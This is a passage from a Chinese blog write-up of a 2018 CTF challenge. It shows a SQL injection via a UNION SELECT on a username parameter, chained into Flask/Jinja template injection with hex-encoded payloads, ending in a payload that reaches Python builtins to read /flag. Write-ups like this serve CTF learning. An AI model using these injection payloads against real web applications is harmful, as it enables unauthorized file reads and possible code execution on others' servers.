<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.105.148.65:29003&#x2F;?username&#x3D;&#39; union select 1,2, group_concat(comment) from comment%23</span><br></pre></td></tr></table></figure>

<p>发生了神奇的一幕</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541418660488.png"></p>
<p><code>render</code>   这不是模板渲染函数吗</p>
<p>结合<code>flask</code>，确实可能存在SSTI模板注入漏洞！</p>
<p>于是开始尝试SSTI的思路。</p>
<h3 id="flask-模板注入测试"><a href="#flask-模板注入测试" class="headerlink" title="flask 模板注入测试"></a>flask 模板注入测试</h3><p>两篇大佬的文章，可以参考一下</p>
<p>[Flask/Jinja 模板注入](Flask/Jinja 模板注入)</p>
<p><a target="_blank" rel="noopener" href="https://www.colabug.com/2805940.html">用python继承链搞事情</a></p>
<p>直接</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.105.148.65:29003&#x2F;?username&#x3D;&#39; union select 1,2，&#123;&#123;1+1&#125;&#125; %23</span><br></pre></td></tr></table></figure>

<p>会出错</p>
<p>用16进制可以绕过。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.105.148.65:29003&#x2F;?username&#x3D;&#39; union select 1,2,0x7b7b312b317d7d %23</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541419486194.png"></p>
<p>看来思路是对的，可以绕过并且有效</p>
<p>继续</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.105.148.65:29003&#x2F;?username&#x3D;&#39; union select 1,2,0x7b7b27272e5f5f636c6173735f5f7d7d %23</span><br><span class="line"></span><br><span class="line">&lt;type &#39;str&#39;&gt;</span><br></pre></td></tr></table></figure>



<p>看看有哪些可以用的函数</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.105.148.65:29003&#x2F;?username&#x3D;&#39; union select 1,2,0x7b7b28292e5f5f636c6173735f5f2e5f5f62617365735f5f5b305d2e5f5f737562636c61737365735f5f28295b35395d2e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e5f5f6275696c74696e735f5f7d7d %23</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541424060848.png"></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541423847552.png"></p>
<p>我尝试eval函数执行命令，但是似乎有问题总是返回<code>0</code>，哪位大佬成功了，麻烦联系一下我，我学习一下大佬的姿势。</p>
<p>于是使用<code>open()</code>函数读取flag</p>
<p>最终payload</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&#123;&#123;().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__[&#39;open&#39;](&#39;&#x2F;flag&#39;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;47.105.148.65:29003&#x2F;?username&#x3D;&#39; union select 1,2,0x7b7b28292e5f5f636c6173735f5f2e5f5f62617365735f5f5b305d2e5f5f737562636c61737365735f5f28295b35395d2e5f5f696e69745f5f2e5f5f676c6f62616c735f5f2e5f5f6275696c74696e735f5f5b276f70656e275d28272f666c616727292e7265616428297d7d %23</span><br></pre></td></tr></table></figure>



<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541425337342.png"></p>
<p><em>比赛时，失误太多了，其实我也有想到模板注入（毕竟提示flask），也想到SQL注入，但是硬是没做出来，太菜了==、学习了学习了</em></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:v0wldl@163.com">V0WKeep3r</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://v0w.top/2018/11/04/2018%E7%9C%81%E8%B5%9BWP/">http://v0w.top/2018/11/04/2018%E7%9C%81%E8%B5%9BWP/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://v0w.top">V0W's Blog</a>！</span></div></div><div class="post-meta__tag-list"></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="http://image.v0w.top/Blog/2020-08-28-044057.png"><div class="post-qr-code__desc">支付宝打赏</div></div><div class="post-qr-code-item"><img class="post-qr-code__img" src="http://image.v0w.top/Blog/2020-08-28-044040.png"><div class="post-qr-code__desc">微信打赏</div></div></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2018/11/06/%E8%BF%81%E7%A7%BB%E4%B8%83%E7%89%9B%E4%BA%91%E5%88%B0github/"><i class="fa fa-chevron-left">  </i><span>迁移七牛云图床到github</span></a></div><div class="next-post pull-right"><a href="/2018/10/22/CTF%E4%B8%AD%E5%B8%B8%E8%A7%81%E7%9A%84%E9%9A%90%E5%86%99%E6%9C%AF%E5%A5%97%E8%B7%AF/"><span>CTF中常见隐写术套路</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = 'false' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'xuqLRcah5FaInOgKRdj9JB3V-gzGzoHsz',
  appKey:'8vMPXnFoh7Fih1g29jw4JNxl',
  placeholder:'师傅可以留下你的评论和邮箱，V0W能够通过邮件get并回复哦～',
  avatar:'retro',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(/img/index.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2020 By V0WKeep3r</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>